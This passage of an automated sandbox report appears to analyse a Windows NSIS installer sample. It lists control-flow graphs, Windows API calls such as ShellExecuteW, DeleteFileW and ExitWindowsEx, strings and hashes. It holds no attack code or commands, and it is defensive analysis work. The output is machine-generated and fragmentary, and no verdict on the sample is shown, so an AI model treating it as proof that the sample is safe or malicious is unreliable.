4137->4138 4139 403eba lstrcatW 4138->4139 4139->4044 4140->4127 4141->4137 4143 403cbd 4142->4143 4144 4038a2 4143->4144 4145 403cc2 FreeLibrary GlobalFree 4143->4145 4146 406cc7 4144->4146 4145->4144 4145->4145 4147 4067aa 18 API calls 4146->4147 4148 406cda 4147->4148 4149 406ce3 DeleteFileW 4148->4149 4150 406cfa 4148->4150 4189 4038ae CoUninitialize 4149->4189 4151 406e77 4150->4151 4193 406035 lstrcpynW 4150->4193 4157 406301 2 API calls 4151->4157 4177 406e84 4151->4177 4151->4189 4153 406d25 4154 406d39 4153->4154 4155 406d2f lstrcatW 4153->4155 4158 40677d 2 API calls 4154->4158 4156 406d3f 4155->4156 4160 406d4f lstrcatW 4156->4160 4162 406d57 lstrlenW FindFirstFileW 4156->4162 4159 406e90 4157->4159 4158->4156 4163 40674e 3 API calls 4159->4163 4159->4189 4160->4162 4161 4062cf 11 API calls 4161->4189 4166 406e67 4162->4166 4190 406d7e 4162->4190 4164 406e9a 4163->4164 4167 4062cf 11 API calls 4164->4167 4165 405d32 CharNextW 4165->4190 4166->4151 4168 406ea5 4167->4168 4169 405e5c 2 API calls 4168->4169 4170 406ead RemoveDirectoryW 4169->4170 4174 406ef0 4170->4174 4175 406eb9 4170->4175 4171 406e44 FindNextFileW 4173 406e5c FindClose 4171->4173 4171->4190 4173->4166 4176 404f9e 25 API calls 4174->4176 4175->4177 4178 406ebf 4175->4178 4176->4189 4177->4161 4180 4062cf 11 API calls 4178->4180 4179 4062cf 11 API calls 4179->4190 4181 406ec9 4180->4181 4184 404f9e 25 API calls 4181->4184 4182 406cc7 72 API calls 4182->4190 4183 405e5c 2 API calls 4185 406dfa DeleteFileW 4183->4185 4186 406ed3 4184->4186 4185->4190 4187 406c94 42 API calls 4186->4187 4187->4189 4188 404f9e 25 API calls 4188->4171 4189->3927 4189->3928 4190->4165 4190->4171 4190->4179 4190->4182 4190->4183 4190->4188 4191 404f9e 25 API calls 4190->4191 4192 406c94 42 API calls 4190->4192 4194 406035 lstrcpynW 4190->4194 4191->4190 4192->4190 4193->4153 4194->4190 4195->4076 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                        • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426D79,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                      • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                      • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                      • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                      • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                      • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                      • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                      • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                      • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                      • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                      • String ID: jF
                                                                                                                                                                                                                                      • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                      • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                      • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 310444273-0
                                                                                                                                                                                                                                      • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                      • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
